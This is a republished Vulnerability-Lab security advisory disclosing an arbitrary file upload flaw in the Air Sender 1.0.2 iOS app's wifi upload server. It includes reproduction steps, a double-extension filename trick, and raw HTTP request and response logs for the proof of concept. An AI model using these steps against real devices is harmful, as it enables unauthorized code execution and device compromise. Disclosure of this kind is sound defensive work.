Home Air Sender 1.0.2
Post
Cancel

Air Sender 1.0.2

There is an arbitrary file upload vulnerability present in the iOS version 1.0.2 of Air Sender.

1
MD5 | 1be8fe922a7c416f5c4ef8ecbdd3f758
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
    Document Title:
    ===============
    Air Sender v1.0.2 iOS - Arbitrary File Upload Vulnerability
    
    References (Source):
    ====================
    https://www.vulnerability-lab.com/get_content.php?id=2212
    
    Release Date:
    =============
    2020-04-24
    
    Common Vulnerability Scoring System:
    ====================================
    7.4
    
    Vulnerability Class:
    ====================
    Arbitrary File Upload
    
    Affected Product(s):
    ====================
    Tran Tu
    Air Sender v1.0.2 iOS - Apple iOS Mobile Web Application
    
    Exploitation Technique:
    =======================
    Remote
    
    Severity Level:
    ===============
    High
    
    Technical Details & Description:
    ================================
    An arbitrary file upload web vulnerability has been discovered in the
    official Air Sender v1.0.2 iOS mobile application.
    The web vulnerability allows remote attackers to upload arbitrary files
    to compromise for example the file system of a service.
    
    The arbitrary upload vulnerability is located in the within the
    web-server configuration when using the upload module.
    Remote attackers are able to bypass the local web-server configuration
    by an upload of malicious webshells. Attackers
    are able to inject own files with malicious `filename` values in the
    `upload` POST method request to compromise the
    mobile web-application. The application does not perform checks for
    multiple file extensions. Thus allows an attacker
    to upload for example to upload a html.js.png file. After the upload the
    attacker requests the original url source
    with the uploaded file and removes the unwanted extension to execute the
    code in the unprotected web-frontend.
    
    The security risk of the vulnerability is estimated as high with a
    common vulnerability scoring system count of 7.0.
    Exploitation of the web vulnerability requires a low privilege ftp
    application user account and no user interaction.
    Successful exploitation of the arbitrary file upload web vulnerability
    results in application or device compromise.
    
    Request Method(s):
    [+] POST
    
    Vulnerable Module(s):
    [+] ./upload
    
    Vulnerable File(s):
    [+] list?path=
    [+] download?path=
    
    
    Proof of Concept (PoC):
    =======================
    The arbitrary file upload vulnerability can be exploited by remote
    attackers without user interaction and with local network access.
    For security demonstration or to reproduce the vulnerability follow the
    provided information and steps below to continue.
    
    
    Manual steps to reproduce the vulnerability ...
    1. Install and start the ios mobile application on your apple device
    2. Open your local browser and start to tamper the http session
    2. Open the wifi user interface without authentication by default
    4. Click upload, choose any file
    5. Change the files name to your script code test payload via session tamper
    6. Continue to submit the manipulated content
    7. Open the via the list or download url to the uploaded html / js file
    to execute it
    8. Successful reproduce of the mobile ios vulnerability!
    
    
    PoC: Exploitation
    http://localhost/download?path=0010101001.html.js
    http://localhost/download?path=0010101001.html.js
    
    
    --- PoC Session Logs [POST] ---
    http://localhost/upload
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
    Gecko/20100101 Firefox/75.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data;
    boundary=---------------------------418835692331824972282021572505
    Content-Length: 2609
    Origin: http://localhost
    Connection: keep-alive
    Referer: http://localhost/
    Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
    path=/&files[]=0010101001.html.js.png
    -
    POST: HTTP/1.1 200 OK
    Cache-Control: no-cache
    Content-Length: 2
    Content-Type: application/json
    Connection: Close
    Server: GCDWebUploader
    -
    http://localhost/list?path=[PATH]/[Evil.Source]
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
    Gecko/20100101 Firefox/75.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Connection: keep-alive
    Referer: http://localhost/
    Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
    -
    GET: HTTP/1.1 200 OK
    Cache-Control: no-cache
    Content-Length: 381
    Content-Type: application/json
    Connection: Close
    Server: GCDWebUploader
    -
    http://localhost/download?path=0010101001.html.js
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
    Gecko/20100101 Firefox/75.0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://localhost/
    Cookie: _ga=GA1.4.376521534.1586884411; _gid=GA1.4.1374601525.1586884411
    Upgrade-Insecure-Requests: 1
    -
    GET: HTTP/1.1 200 OK
    Connection: Close
    Server: GCDWebUploader
    Date: Tue, 14 Apr 2020 19:35:28 GMT
    Content-Disposition: attachment; filename="0010101001.html.js";
    filename*=UTF-8''0010101001.html.js
    Content-Length: 2270
    Cache-Control: no-cache
    Etag: 4306047746/1586892764/961771080
    
    
    Reference(s):
    http://localhost/list
    http://localhost/upload
    http://localhost/download
    
    
    
    Credits & Authors:
    ==================
    Vulnerability-Lab -
    https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
    Benjamin Kunz Mejri -
    https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
    
    
    --
    VULNERABILITY LABORATORY - RESEARCH TEAM
    SERVICE: www.vulnerability-lab.com


Source :   https://packetstormsecurity.com

This post is licensed under CC BY 4.0 by the author.